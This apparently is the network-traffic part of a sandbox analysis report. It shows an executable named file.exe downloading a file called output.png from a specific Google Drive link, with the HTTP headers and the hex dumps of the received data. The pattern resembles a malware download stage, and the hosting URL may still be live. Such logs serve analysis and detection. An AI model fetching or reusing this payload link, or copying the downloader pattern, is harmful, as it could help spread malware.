2024-12-12 15:53:45 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 12 Dec 2024 15:53:44 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-FXWw7_WPey9CdAD0Z_hY6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49718	172.217.17.46	443	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:44 UTC	150	OUT	GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Host: drive.google.com Cache-Control: no-cache
2024-12-12 15:53:45 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 12 Dec 2024 15:53:44 GMT Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-HEotRJgmMpxHtIKzMFlFhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49724	142.250.181.65	443	7456	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:47 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-12 15:53:49 UTC	4915	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT X-GUploader-UploadID: AFiumC7qmFgHJ8DOjLNVFCZw_tCBklXEk6Yh9QAhyWMm8GITWZexwX5CBjWsD0aY31HxuA1Me1w Date: Thu, 12 Dec 2024 15:53:49 GMT Expires: Thu, 12 Dec 2024 15:53:49 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:53:49 UTC	4915	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-12 15:53:49 UTC	4873	IN	Data Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-12 15:53:49 UTC	1317	IN	Data Raw: 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 f7 8e 79 1f 2e Data Ascii: q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!Cy.
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6 Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8 Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63 Data Ascii: ]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a2yMc
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1 Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
2024-12-12 15:53:49 UTC	1390	IN	Data Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49725	142.250.181.65	443	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:47 UTC	192	OUT	GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1 User-Agent: FileDownloader Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-12 15:53:52 UTC	4915	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="output.png" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 156917 Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT X-GUploader-UploadID: AFiumC6Wtk48iU8t_R1-RLZE6fXh-9JdkKOKLH9qTtS2ktuTd3Au5wAHa6Jm0l_KM5Q4_ohuuBE Date: Thu, 12 Dec 2024 15:53:51 GMT Expires: Thu, 12 Dec 2024 15:53:51 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=h6mvlQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:53:52 UTC	4915	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92 Data Ascii: PNGIHDRpIDATx\|e3D dw6SY[#Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#%XCTE6g0q=d>e[-R,$)YN<2'$
2024-12-12 15:53:52 UTC	4868	IN	Data Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2 Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a\|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
2024-12-12 15:53:52 UTC	1322	IN	Data Raw: 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43 Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
2024-12-12 15:53:52 UTC	1390	IN	Data Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6 Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
